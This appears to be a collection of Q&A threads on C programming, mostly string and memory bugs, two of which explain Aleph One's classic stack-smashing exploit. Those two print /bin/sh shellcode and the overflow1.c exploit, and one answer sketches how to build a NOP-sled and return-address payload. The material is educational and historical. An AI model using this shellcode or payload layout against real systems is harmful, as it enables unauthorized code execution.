Avoid NUL Terminating Character for Stack Smashing with strcpy()

I have recently been following aleph1's Smashing The Stack For Fun And Profit paper, and I've reached a part where I am unable to smash the stack with strcpy.
In the chapter titled "Writing an Exploit (or how to mung the stack)", aleph1 writes the following code (which I tried to run on my computer):
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
What we have done above is filled the array large_string[] with the
address of buffer[], which is where our code will be. Then we copy our
shellcode into the beginning of the large_string string. strcpy() will then
copy large_string onto buffer without doing any bounds checking, and will
overflow the return address, overwriting it with the address where our code
is now located. Once we reach the end of main and it tried to return it
jumps to our code, and execs a shell.
This code works exactly as it's supposed to for me until it gets to this line:
strcpy(buffer,large_string);
After lots of digging around, I found out that strcpy doesn't overflow buffer as it should, because the address of buffer (which is copied many times into large_string) has NUL string-terminating zeros in it.
Therefore, strcpy() stops after the first NUL it runs into, which is well before we overwrite the return address of main with buffer's address.
Is there a way to solve this problem and somehow make the address of buffer not have any zeroes in it?
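The effect described in the question can be reproduced without any overflow. The following is a minimal sketch, assuming a 32-bit little-endian layout; the helper names has_nul_byte and copyable_length and the two example addresses are made up for illustration and are not taken from the paper. It only measures how many bytes strcpy() would copy from a 128-byte block filled with a repeated address.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Returns 1 if any of the four bytes of a 32-bit value is zero. */
int has_nul_byte(uint32_t word) {
    for (int shift = 0; shift < 32; shift += 8) {
        if (((word >> shift) & 0xffu) == 0) {
            return 1;
        }
    }
    return 0;
}

/*
 * Fills out[0..127] with the little-endian bytes of `word` repeated 32 times,
 * terminates the block at out[128], and returns strlen() of the result, which
 * is the number of bytes strcpy() would copy before it stops.
 * `out` must have room for at least 129 bytes.
 */
size_t copyable_length(uint32_t word, char *out) {
    assert(out != NULL);
    for (size_t i = 0; i < 128; i++) {
        out[i] = (char)((word >> (8 * (i % 4))) & 0xffu);
    }
    out[128] = '\0';
    return strlen(out);
}
```

With a hypothetical low address such as 0x0012ff40, the fourth byte is zero, so only 3 bytes would be copied; with a hypothetical high address such as 0xbffff6a0, all 128 bytes would be copied.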

I guess you are on Windows with a little-endian processor. As far as I know, Linux places the stack near the top of the address space, so a stack address usually contains no NUL byte, whereas on Windows the stack sits at a low address, so its address does contain one. The trick is to pad your shellcode with enough NOP instructions that the payload reaches exactly up to the return address. Because your address contains a NUL byte, you can write the return address only once (strcpy stops at the NUL byte), so it has to be the last thing copied. To do this, look at the assembly, calculate the exact number of bytes needed in front of the return address, and put the target return address right after them.
Here is the pseudocode:
// &ret_addr is the address of the stack slot that holds main's return address.
// To get it:
// view in debugger
// break at the first instruction in main (usually a push ebp instruction)
// look at the ESP register value
a = &ret_addr - &buffer // length of [NOP] + [SHELLCODE]
// fill large_string with return address
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
// fill large_string with NOP
n = a - strlen(shellcode)
for (i = 0; i < n; i++)
large_string[i] = NOP;
// fill large_string with your shellcode
for (i = 0; i < strlen(shellcode); i++)
large_string[n+i] = shellcode[i];
At the end large_string will look like this
[n bytes] [strlen(shellcode) bytes] [Rest Bytes]
[NOP] [SHELLCODE] [RETURN ADDRESS]
and buffer will look like this
[n bytes] [strlen(shellcode) bytes] [4 Bytes]
[NOP] [SHELLCODE] [RETURN ADDRESS]
Remember that this works only if the NX bit and stack canaries are turned off. Try it in a debugger to understand it well.

Related

Segmentation fault on copying string elements to another string

Why am I getting a segmentation fault? I have listed my code below.
Please tell me if you know what my mistake is and how to correct it.
What I am trying to do here
I am trying to take numbers as input and for them I have to output a string of characters.
Problem
link to the problem is here.
The code of my proposed solution
#include <stdio.h>
#include <string.h>
#include <math.h>
int main() {
long long int n, k;
char manku[] = { 'm', 'a', 'n', 'k', 'u' };
char l[10000000];
int t, i = 0, j, p;
scanf("%d", &t);
while (t > 0)
{
scanf("%lld", &n);
while (n > 0)
{
j = n % 5;
if (j == 0)
l[i] = manku[4];
else
l[i] = manku[j - 1];
n = n / 5;
i++;
}
p = strlen(l);
for (i = 0; i < p; i++)
l[i] = l[p - 1 - i];
for (i = 0; i < p; i++)
printf("%c", l[i]);
t--;
}
return 0;
}

char l[10000000];
This huge array is overflowing your stack.
The stack is the area of memory used for automatic variables, and it is fairly small. It is not a good idea to put such a huge array on the stack.
Try allocating it dynamically, like this:
char *l;
l = malloc(10000000); // needs <stdlib.h>; note: sizeof(char) is 1
With this, the memory for l is allocated on the heap. Make sure to free it once you are done with it.
Alternatively, you can make l a global variable or a static local variable so that it goes in the data segment.

You are getting a segmentation fault when you start running your binary because you are running out of stack memory due to the big size of your array char l[10000000] (you can check the size of your stack by running
$ ulimit -s
in your shell).
There are at least two solutions to this:
1) Increase the size of your stack. You can do this by running, e.g.,
$ ulimit -s unlimited
in your shell before running the binary.
2) Use malloc to allocate the l array, so that it is allocated on the heap rather than on the stack.

First, reset the variable i to 0 every time after scanning n.
while(t>0) {
scanf("%lld",&n);
i = 0; /* initialize i every time here */
while(n>0) {
/* some code */
}
}
Also, instead of creating a stack-allocated array like char l[10000000];, allocate the array dynamically once before the while loop and free it once you are done, e.g.:
char *l = malloc(SIZE); /* define the SIZE */
...
...
free(l);

Short Answer: The segmentation fault is caused by char l[10000000];. Declaring char l[26]; is sufficient (char l[27]; if you also store a terminating null character).
Details
As others said, the allocation char l[10000000]; causes the segmentation fault. You do not need this much memory. The question states that the maximum value for n is 10^18. Thus the maximum length of a word is 26 characters, and char l[26]; is sufficient for the characters themselves.
Explanation: It is given that you have 10^18 options to arrange k characters. Each character has 5 options, and thus the number of options to arrange these characters is 5^k. Now you just have to find k:
5^k = 10^18 ==> k = log_5(10^18) ~= 25.75218 < 26
Implementation
Regarding the implementation, a few things are wrong.
You do not set i = 0; after each input scan.
You cannot use strlen without the terminating null character. You should add l[i] = '\0'; above p = strlen(l);.
Your second for loop, the one that should reverse the string, does not work properly. Each step overwrites part of the string, and the later steps read the overwritten characters instead of the original ones.
Regarding the algorithm, it does not work properly either. I can give you a hint: this problem is similar to counting in base-5.
Comments
The things above are just a few things that I have noticed. I think you should consider rewriting the code, since it may still contain small flaws.
Another tip: for printing strings (character arrays in C) you can use
printf("%s", str);
This assumes that str is a character array that ends with the terminating null character. Some more information here.
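The reversal problem mentioned above can be avoided by swapping characters from both ends instead of overwriting them. This is a minimal sketch of that one step only, not a solution to the whole problem; the function name reverse_in_place is made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Reverses the first len characters of s in place by swapping the two ends
 * and moving inwards, so no character is read after it was overwritten. */
void reverse_in_place(char *s, size_t len) {
    assert(s != NULL);
    if (len < 2) {
        return; /* nothing to swap */
    }
    size_t left = 0;
    size_t right = len - 1;
    while (left < right) {
        char tmp = s[left];
        s[left++] = s[right];
        s[right--] = tmp;
    }
}
```

In the question's loop this would be called as reverse_in_place(l, i) once the digits have been written, after which l[i] = '\0'; makes the buffer safe to pass to strlen or printf("%s", l).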

Parse single message coming over socket containing 2 strings in C

I'm trying to read a message that is sent over a socket. The message contains 2 strings that could be anything.
Note that I'm using C in Ubuntu environment.
The format of the message is, in a single void* buffer:
[string1]\0[string2]\0
I figured I'd be able to separate them once they arrive, using the '\0' to figure out where to split them. I'm using a function to read just the string and it sort of works, but I keep getting complaints from Valgrind, and I don't understand why.
I'm going to use an example where only 1 string is read from the buffer, but I mention the strategy because I'm not able to just put the message into a char* buffer. I need the function to extract a string from more complex buffers.
It all starts like this:
void* buffer = malloc(msgSize * sizeof(char)); //the message size is properly calculated to include the '\0' at the end
char* instanceId = malloc(msgSize * sizeof(char));
if(recv(socket_desc, (void*) buffer, msgSize * sizeof(char), MSG_WAITALL) <= 0) {
log_error(logger, "Message failed.");
return;
}
bufferToString(buffer, &instanceId, 0);
bufferToString2(buffer, instanceId, 0);
I made several attempts to make bufferToString work, as you can see... Of course I don't invoke them all at the same time, but I want to share those lines in case I'm making a mistake there.
Attempt 1: char by char
int bufferToString(void* buffer, char** string, int startPtr) {
//startPtr can be used to read strings that are in the middle of a buffer
char a;
int thisStringPtr = 0;
do {
a = *(char*) (buffer + startPtr);
(*string)[thisStringPtr] = a;
startPtr++;
thisStringPtr++;
} while (a != '\0');
return startPtr; //return end position to use for extracting more values later
}
This one complains:
==23047== Invalid read of size 1
==23047== at 0x403A27A: bufferToString (buffer.c:16)
==23047== by 0x804A0C2: handleHiloInstancia (coordinador.c:232)
==23047== by 0x8049C54: procesarConexion (coordinador.c:85)
==23047== by 0x4066294: start_thread (pthread_create.c:333)
==23047== by 0x41650AD: clone (clone.S:114)
==23047== Address 0x423bc8a is 0 bytes after a block of size 10 alloc'd
==23047== at 0x402C17C: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==23047== by 0x804A063: handleHiloInstancia (coordinador.c:225)
==23047== by 0x8049C54: procesarConexion (coordinador.c:85)
==23047== by 0x4066294: start_thread (pthread_create.c:333)
==23047== by 0x41650AD: clone (clone.S:114)
Line 16 of bufferToString is the first line inside the do statement.
Attempt 2: cast and copy
int bufferToString2(void* buffer, char* string, int startPtr) {
strcpy(string, (char*) (buffer + startPtr));
return (strlen(string) + 1)*sizeof(char);
}
With or without the +startPtr, this causes slightly different problems:
==23190== Invalid read of size 1
==23190== at 0x402F489: strcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==23190== by 0x403A1E3: bufferToString2 (buffer.c:3)
==23190== by 0x804A0C1: handleHiloInstancia (coordinador.c:232)
==23190== by 0x8049C54: procesarConexion (coordinador.c:85)
==23190== by 0x4066294: start_thread (pthread_create.c:333)
==23190== by 0x41650AD: clone (clone.S:114)
==23190== Address 0x423bc8a is 0 bytes after a block of size 10 alloc'd
I tried a few other combinations (like using char** string and all the required modifications in bufferToString2), but I keep getting similar error messages. What am I not seeing?
UPDATE: How message is being sent:
int bufferSize;
void* buffer = serializePackage(HANDSHAKE_INSTANCE_ID ,instancia_config->nombre, &bufferSize );
printf("Buffer size: %i - Instancia Name = %s - Socket num: %i\n", bufferSize, instancia_config->nombre, socket_coordinador); //this shows right data
if (send(socket_coordinador,buffer,bufferSize, 0) <= 0) {
log_error(logger, "Could not send ID.");
endProcess(EXIT_FAILURE);
}
instancia_config->nombre is of type char*
void* serializePackage(int codigo,char * mensaje, int* tamanioPaquete){
int puntero = 0;
int length = strlen(mensaje);
int sizeOfPaquete = strlen(mensaje) * sizeof(char) + 1 + 2 * sizeof(int);
void * paquete = malloc(sizeOfPaquete);
memcpy((paquete + puntero) ,&codigo,sizeof(int));
puntero += sizeof(int);
memcpy((paquete + puntero),&length,sizeof(int));
puntero += sizeof(int);
memcpy((paquete + puntero),mensaje,length * sizeof(char) + 1);
*tamanioPaquete = sizeOfPaquete;
return paquete;
}

Do you have your src and dst the right way around?
The destination (or target, if you prefer) of the string and memory functions in C is the first parameter, so:
strcpy(string, buffer)
will copy buffer into string. (https://www.tutorialspoint.com/c_standard_library/c_function_strcpy.htm)
But: bufferToString2 is being called with buffer as the first parameter (and it's the source in this case).
In the first case, as was pointed out, standard C does not allow arithmetic on a void* (GCC accepts it as an extension and treats the element size as 1), because the math tries to go to the Nth element when you say:
*(x + N)
and if x points to void, the element has no size, so the Nth element isn't meaningful.

Since no answer so far has evidently solved the problem, and there has been no further progress on this question, I will summarize what I partially mentioned in my comments, to at least provide hints about where to start looking:
Unfortunately, a lot of the information needed to treat this question seriously is missing.
For example, which kind of socket do you use to send / receive your messages?
Is it a pipe or a network socket, and which kind of transport do you use then?
How do you ensure that you received the entire message?
You should at least check the return value of recv (which happens to be the number of received octets) and compare it with the expected length, if there is one.
When you have received your message, dump it as is. If you are not familiar with using a debugger, a function like this would do as a starter:
void dump(const char* buffer, size_t length) {
for(size_t i = 0; i < length; ++i) {
printf("%02x ", (unsigned)(buffer[i] & 0xff)); /* two hex digits per byte */
}
printf("\n");
}
and invoke it in your code after the ssize_t received = recv(...) like dump(buffer, received).
Furthermore, you don't show how you calculate msgSize in your first code snippet. How do you guarantee that the string in mensaje that you pass to serializePackage is not longer than msgSize?
Then, in serializePackage, you create a buffer laid out like this:
| codigo (int) | length (int) | mensaje (+ terminating zero) |
but what you read back at the other end is just a C string. You ought to read the 2 ints as well, ought you not?
Then there is another problem with this bit of serialization: even if you read back the 2 ints, you would have a piece of code that is entirely unportable and works only if both sender and receiver run on architectures that represent ints in precisely the same way, with the same width and the same byte order. If int is 4 bytes on the sender but 8 bytes on the receiver, for example, you write 4-byte integers while attempting to read back 8-byte integers. Better use types with a precisely defined width (like uint32_t from inttypes.h) and explicitly convert to/from network byte order using e.g. ntohl(3) / htonl(3).
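The following is a minimal sketch of that suggestion, not the asker's actual protocol. It assumes a wire format in which both header fields are sent as uint32_t in network byte order, which differs from what serializePackage currently writes; the names serialize_packet, parse_packet and HEADER_SIZE are made up for illustration. htonl and ntohl come from the POSIX header arpa/inet.h.

```c
#include <arpa/inet.h> /* htonl, ntohl (POSIX) */
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Assumed wire format: | code (uint32) | length (uint32) | message + '\0' | */
#define HEADER_SIZE (2 * sizeof(uint32_t))

/* Writes the packet into out (capacity cap).
 * Returns the number of bytes written, or 0 if the packet does not fit. */
size_t serialize_packet(uint32_t code, const char *msg,
                        unsigned char *out, size_t cap) {
    assert(msg != NULL && out != NULL);
    size_t length = strlen(msg);
    size_t total = HEADER_SIZE + length + 1;
    if (total > cap) {
        return 0;
    }
    uint32_t net_code = htonl(code);
    uint32_t net_length = htonl((uint32_t)length);
    memcpy(out, &net_code, sizeof net_code);
    memcpy(out + sizeof net_code, &net_length, sizeof net_length);
    memcpy(out + HEADER_SIZE, msg, length + 1); /* includes the terminator */
    return total;
}

/* Reads the header back from buf (size bytes received).
 * Returns a pointer to the message inside buf, or NULL if the packet is
 * truncated or the message is not terminated where the header says. */
const char *parse_packet(const unsigned char *buf, size_t size,
                         uint32_t *code, uint32_t *length) {
    assert(buf != NULL && code != NULL && length != NULL);
    if (size < HEADER_SIZE) {
        return NULL;
    }
    uint32_t net_code, net_length;
    memcpy(&net_code, buf, sizeof net_code);
    memcpy(&net_length, buf + sizeof net_code, sizeof net_length);
    *code = ntohl(net_code);
    *length = ntohl(net_length);
    /* The body must hold `length` characters plus one terminator byte. */
    if (*length >= size - HEADER_SIZE) {
        return NULL;
    }
    if (buf[HEADER_SIZE + *length] != '\0') {
        return NULL;
    }
    return (const char *)(buf + HEADER_SIZE);
}
```

Copying the header fields with memcpy rather than casting the buffer pointer avoids alignment problems, and checking the length against the number of bytes actually received keeps the parser from reading past the end of the buffer.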
Lastly, I want to add some remarks on code quality that might prevent a lot of potential errors.
Take your bufferToString as an example:
You passed in string as char** - why?
Use appropriate data types - don't use a signed int where you deal with non-negative sizes - use the standard type size_t instead.
Don't use void* as a type unless really necessary - you lose a lot of compile-time error checking, because C converts to and from void* implicitly in assignments. So declaring buffer as char* is highly recommended.
This function, for example, can be greatly simplified:
size_t bufferToString(const char* buffer, char* string, size_t offset) {
size_t i = 0;
while (buffer[offset + i] != '\0') {
string[i] = buffer[offset + i];
++i;
}
string[i] = '\0'; /* terminate the copy */
return offset + i + 1; /* offset of the byte after the terminator */
}
I can only emphasize that network code tends to be hard to debug - there are all kinds of external error sources that you cannot fully control.
Hopefully these hints help to track down the root cause of your problem.
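Valgrind's "0 bytes after a block of size 10" means that a read ran one byte past the end of the received buffer, which happens when no '\0' is found inside it. As a hedged sketch of how the [string1]\0[string2]\0 format from the question could be split without ever reading past the received size, one could bound the search with memchr; the function name next_string is made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Finds the NUL-terminated string that starts at buf[offset] without reading
 * past buf[size - 1]. On success it stores the start of the string in *out
 * and returns the offset just past its terminator; it returns 0 if offset is
 * out of range or no terminator exists within the buffer.
 */
size_t next_string(const char *buf, size_t size, size_t offset,
                   const char **out) {
    assert(buf != NULL && out != NULL);
    if (offset >= size) {
        return 0;
    }
    const char *start = buf + offset;
    const char *end = memchr(start, '\0', size - offset);
    if (end == NULL) {
        return 0; /* unterminated: do not hand this to strcpy or strlen */
    }
    *out = start;
    return (size_t)(end - buf) + 1;
}
```

Calling it twice, the second time with the offset returned by the first call, yields both strings; a return value of 0 signals that the message was incomplete or malformed.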

C: Read values of entire flash memory of MCU

I want to read the values of the memory locations of the entire program flash memory of an MCU, in particular, the CC2538 on the OpenMote-CC2538. The values read are then combined; currently, they are simply added up into one large sum.
At this moment, I have the following code working to traverse the memory and get the values:
uint64_t readMemory() {
unsigned char * bytes = (char *) 0x200000;
size_t size = 0x0007FFD4;
size_t i;
uint64_t amount = 0;
for (i = 0; i < size; i++) {
amount += bytes[i];
}
return amount;
}
uint64_t readFlashMemory() {
unsigned int * bytes = (int *) 0x200000;
size_t size = 0x0007FFD4;
size_t i;
uint64_t amount = 0;
for (i = 0; i < size; i+=4) {
amount += FlashGet(bytes);
bytes++;
}
return amount;
}
The flash memory starts at address 0x200000 and its size is 0x0007FFD4. The first function works with a char and goes to each address one by one, while the second one uses an existing function FlashGet(uint32_t) from the flash.c file, which is a direct access to a register (HWREG).
FlashGet requires a uint32_t address and returns a uint32_t value; as such, each value has a length of 4 and the address should advance by 4 in the loop. The first function uses char for the addressing, which has a length of 1, so the address should advance by 1 in the loop. Am I correct in these statements? If so, am I executing them correctly? For the second function, incrementing the pointer by 1 should move it by 4 bytes because it points to a 4-byte type (unsigned int, similar to uint32_t).
However, the functions return a different value.
The first one returns: 674426297757
The second one returns: 8213668631160
As both functions should be doing the same thing, one or both must be incorrect and not reading the entire program flash memory.
How can I fix both functions? Is there a better or easier way to read the entire memory when you have the starting address and size?

Consider a 4-byte flash memory with the content
00 01 02 03
Adding the byte values gives you 0x0000000000000006.
Adding it as one 32-bit int value gives you 0x0000000003020100, assuming little-endian. So both functions can read the entire memory and still return different sums.
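The same arithmetic can be checked on an ordinary array. This is a minimal sketch that works on a plain buffer rather than real flash and does not use FlashGet; the function names are made up for illustration, and the words are assembled explicitly as little-endian so the result does not depend on the host.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Sum of every byte in the region. */
uint64_t sum_bytes(const uint8_t *mem, size_t size) {
    assert(mem != NULL);
    uint64_t total = 0;
    for (size_t i = 0; i < size; i++) {
        total += mem[i];
    }
    return total;
}

/* Assembles the little-endian 32-bit word stored at p. */
static uint32_t load_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Sum of the region read as 32-bit words; size must be a multiple of 4. */
uint64_t sum_words(const uint8_t *mem, size_t size) {
    assert(mem != NULL && size % 4 == 0);
    uint64_t total = 0;
    for (size_t i = 0; i < size; i += 4) {
        total += load_le32(mem + i);
    }
    return total;
}

/* Reads word by word but adds the four bytes of each word separately,
 * so the result matches sum_bytes. */
uint64_t sum_words_bytewise(const uint8_t *mem, size_t size) {
    assert(mem != NULL && size % 4 == 0);
    uint64_t total = 0;
    for (size_t i = 0; i < size; i += 4) {
        uint32_t word = load_le32(mem + i);
        total += (word & 0xffu) + ((word >> 8) & 0xffu) +
                 ((word >> 16) & 0xffu) + ((word >> 24) & 0xffu);
    }
    return total;
}
```

If the two readers are meant to agree, the word-based one has to split each word into its bytes before adding, as sum_words_bytewise does.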

Understanding Aleph One's first buffer overflow exploit

I am reading "Smashing The Stack For Fun And Profit" by Aleph one, and reached this spot:
overflow1.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
Now, I understand all the theory behind the exploit:
the shellcode[] is in the data segment (which is writable), and contains the code to spawn a shell.
We would like to copy its content to main's buffer, and in addition overwrite main's return address with the address of the beginning of the buffer (so that execution control passes to our "spawning a shell" code). We do it by copying the shellcode to the large_string[] buffer (second for-loop), and the rest(???) of large_string[] will contain the buffer's address (first for-loop).
Of course, main's return address will be overwritten by this buffer's address, since we copy large_string[] to buffer[] (strcpy).
My problem is with the little details of the exploit:
1.)
Why does the first for-loop run from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]
2.)
What is strlen(shellcode)?
I would appreciate some clarification on this kind of stuff.
Thanks!

1) Why does the first for-loop run from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]
It copies four bytes at a time (it relies on sizeof(long) being 4 on the target platform, since long_ptr is a long *), and 32 * 4 == 128.
2) What is strlen(shellcode)?
It's the number of bytes in shellcode before the terminating \0 (this relies on the fact that shellcode does not contain embedded \0 characters).
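The pointer arithmetic can be seen in isolation with a harmless value. This is a sketch under the assumption of 4-byte words; it uses uint32_t and memcpy in place of the paper's long pointer so that the word size is fixed, and the names fill_words and LARGE_SIZE are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define LARGE_SIZE 128

/* Fills all LARGE_SIZE bytes of dst with copies of a 4-byte value, one word
 * per iteration, and returns how many iterations were needed. */
size_t fill_words(unsigned char *dst, uint32_t value) {
    assert(dst != NULL);
    size_t words = LARGE_SIZE / sizeof value; /* 128 / 4 == 32 */
    for (size_t i = 0; i < words; i++) {
        /* Word i starts at byte offset i * 4, just like *(long_ptr + i). */
        memcpy(dst + i * sizeof value, &value, sizeof value);
    }
    return words;
}
```

Thirty-two iterations of four bytes each cover the whole 128-byte array, which is why the loop in the paper stops at i = 31. strlen, in turn, simply counts bytes up to the first zero byte, so for a byte string without embedded zeros it returns the full length.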

Trying to free memory after calling strcpy causes the program to crash

I understand that a lot of people here complain about strcpy, but I haven't found anything using search that addresses the issue I have.
First off, calling strcpy doesn't itself cause any sort of crash/segmentation fault. Secondly, the code is contained within a function, and the first time that I call this function it works perfectly. It only crashes on the second time through.
I'm programming with the LPC1788 microcontroller; memory is pretty limited, so I can see why things like malloc may fail, but not free.
The function trimMessage() contains the code, and the purpose of the function is to remove a portion of a large string array if it becomes too large.
void trimMessage()
{
int trimIndex;
// currMessage is a globally declared char array that has already been malloc'd
// and written to.
size_t msgSize = strlen(currMessage);
// Iterate through the array and find the first newline character. Everything
// from the start of the array to this character represents the oldest 'message'
// in the array, to be got rid of.
for(int i=0; i < msgSize; i++)
{
if(currMessage[i] == '\n')
{
trimIndex = i;
break;
}
}
// e.g.: "\fProgram started\r\nHow are you?\r".
char *trimMessage = (char*)malloc((msgSize - trimIndex - 1) * sizeof(char));
trimMessage[0] = '\f';
// trimTimes = the number of times this function has been called and fully executed.
// freeing memory just below is non-sensical, but it works without crashing.
//if(trimTimes == 1) { printf("This was called!\n"); free(trimMessage); }
strcpy(&trimMessage[1], &currMessage[trimIndex+1]);
// The following line will cause the program to crash.
if(trimTimes == 1) free(trimMessage);
printf("trimMessage: >%s<\n", trimMessage);
// Frees up the memory allocated to currMessage from last iteration
// before assigning new memory.
free(currMessage);
currMessage = malloc((msgSize - trimIndex + 1) * sizeof(char));
for(int i=0; i < msgSize - trimIndex; i++)
{
currMessage[i] = trimMessage[i];
}
currMessage[msgSize - trimIndex] = '\0';
free(trimMessage);
trimMessage = NULL;
messageCount--;
trimTimes++;
}
Thank you to everyone that helped. The function works properly now. To those asking why I was trying to print out an array I just freed, that was just there to show that the problem occurred after strcpy and rule out any other code that came after it.
The final code is here, in case it proves useful to anyone who comes across a similar problem:
void trimMessage()
{
int trimIndex;
size_t msgSize = strlen(currMessage);
char *newline = strchr(currMessage, '\n');
if (!newline) return;
trimIndex = newline - currMessage;
// e.g.: "\fProgram started\r\nHow are you?\r".
char *trimMessage = malloc(msgSize - trimIndex + 1);
trimMessage[0] = '\f';
strcpy(&trimMessage[1], &currMessage[trimIndex+1]);
trimMessage[msgSize - trimIndex] = '\0';
// Frees up the memory allocated to currMessage from last iteration
// before assigning new memory.
free(currMessage);
currMessage = malloc(msgSize - trimIndex + 1);
for(int i=0; i < msgSize - trimIndex; i++)
{
currMessage[i] = trimMessage[i];
}
currMessage[msgSize - trimIndex] = '\0';
free(trimMessage);
messageCount--;
}

free can and will crash if the heap is corrupt or if you pass it an invalid pointer.
Looking at that, I think your first malloc is a couple of bytes short. You need to reserve a byte for the null terminator and also you're copying into offset 1, so you need to reserve another byte for that. So what is going to happen is that your copy will overwrite information at the start of the next block of heap (often used for length of next block of heap and an indication as to whether or not it is used, but this depends on your RTL).
When you next do a free, it may well try to coalesce any free blocks. Unfortunately, you've corrupted the next block's header, at which point it will go a bit insane.

Compare these two lines of your code (I've respaced the second line, of course):
char *trimMessage = (char*)malloc((msgSize - trimIndex - 1) * sizeof(char));
currMessage = malloc((msgSize - trimIndex + 1) * sizeof(char));
Quite apart from the unnecessary difference in casting (consistency is important; which of the two styles you use doesn't matter too much, but don't use both in the same code), you have a difference of 2 bytes in the length. The second is more likely to be correct than the first.
You allocated 2 bytes too few in the first case, and the copy overwrote some control information that malloc() et al depend on, so the free() crashed because you had corrupted the memory it manages.
In this case, the problem was not so much strcpy() as miscalculation.
One of the problems with corrupting memory is that the victim code (the code that finds the trouble) is often quite far removed from the code that caused the trouble.
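To make the size calculation explicit, here is a minimal sketch of the copy step as a standalone function. It is not the asker's code: the name trimmed_copy is made up for illustration, and it takes the message as a parameter instead of using the global currMessage.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/*
 * Returns a newly malloc'd copy of msg in which everything up to and
 * including the first '\n' is replaced by a single '\f'. Returns NULL if msg
 * contains no newline or if the allocation fails. The caller frees the result.
 */
char *trimmed_copy(const char *msg) {
    assert(msg != NULL);
    const char *newline = strchr(msg, '\n');
    if (newline == NULL) {
        return NULL;
    }
    const char *rest = newline + 1;
    size_t rest_len = strlen(rest);
    /* 1 byte for '\f' + rest_len characters + 1 byte for the terminator */
    char *out = malloc(1 + rest_len + 1);
    if (out == NULL) {
        return NULL;
    }
    out[0] = '\f';
    memcpy(out + 1, rest, rest_len + 1); /* copies the terminator as well */
    return out;
}
```

Here rest_len equals msgSize - trimIndex - 1 in the question's terms, so the required allocation is msgSize - trimIndex + 1 bytes, two more than the first malloc requested.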
This loop:
for(int i=0; i < msgSize; i++)
{
if(currMessage[i] == '\n')
{
trimIndex = i;
break;
}
}
could be replaced with:
char *newline = strchr(currMessage, '\n');
if (newline == 0)
...deal with no newline in the current messages...
trimIndex = newline - currMessage;

Add this code just before the malloc() call:
// we need the destination buffer to be large enough for the '\f' character, plus
// the remaining string, plus the null terminator
printf("Allocating: %d Need: %d\n", (int)(msgSize - trimIndex - 1), (int)(1 + strlen(&currMessage[trimIndex+1]) + 1));
And I think it will show you the problem.
It's been demonstrated time and again that hand calculating buffer sizes can be error prone. Sometimes you have to do it, but other times you can let a function handle those error prone aspects:
// e.g.: "\fProgram started\r\nHow are you?\r".
char *trimMessage = strdup( &currMessage[trimIndex]);
if (trimMessage && (trimMessage[0] == '\n')) {
trimMessage[0] = '\f';
}
If your runtime doesn't have strdup(), it's easy enough to implement (http://snipplr.com/view/16919/strdup/).
And as a final edit, here's an alternative, simplified trimMessage() that I believe to be equivalent:
void trimMessage()
{
char *newline = strchr(currMessage, '\n');
if (!newline) return;
memmove( currMessage, newline, strlen(newline) + 1);
currMessage[0] = '\f'; // replace '\n'
messageCount--;
}
